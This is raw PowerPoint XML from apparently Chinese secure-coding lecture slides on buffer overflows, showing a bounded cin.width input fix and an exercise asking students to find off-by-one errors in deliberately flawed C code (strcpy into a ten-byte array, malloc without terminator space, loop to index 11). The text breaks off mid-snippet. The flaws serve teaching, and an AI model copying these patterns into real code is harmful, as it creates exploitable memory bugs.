            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. #include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>iostream.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3.  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[12];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cin.width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(12);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>5.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt;&lt; "echo: " &lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt;&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>endl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>6. }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>简单的解决方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433156" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2438400"/>
            <a:ext cx="5562600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50801"/>
              <a:gd name="adj2" fmla="val 100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如果其域宽（继承自</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" dirty="0" err="1">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ios_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>：：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>width </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>）被设置为大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" dirty="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>，提取操作可以被限制为只提取指定数量的字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433157" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3276600"/>
            <a:ext cx="4343400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -75477"/>
              <a:gd name="adj2" fmla="val 48787"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>一次提取操作调用结束后域宽被重置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="180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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="488571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3156"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="433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33157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="433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animBg="1"/>
      <p:bldP spid="43315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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>、差一错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2138604"/>
            <a:ext cx="8604448" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>你能找出这个程序中所有差一错误吗？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 2.   char source[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 3.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(source, "0123456789");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 4.   char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> = (char *)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>(source));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 5.   for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt;= 11; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 6.     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>] = source[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 7.   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> 8.   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
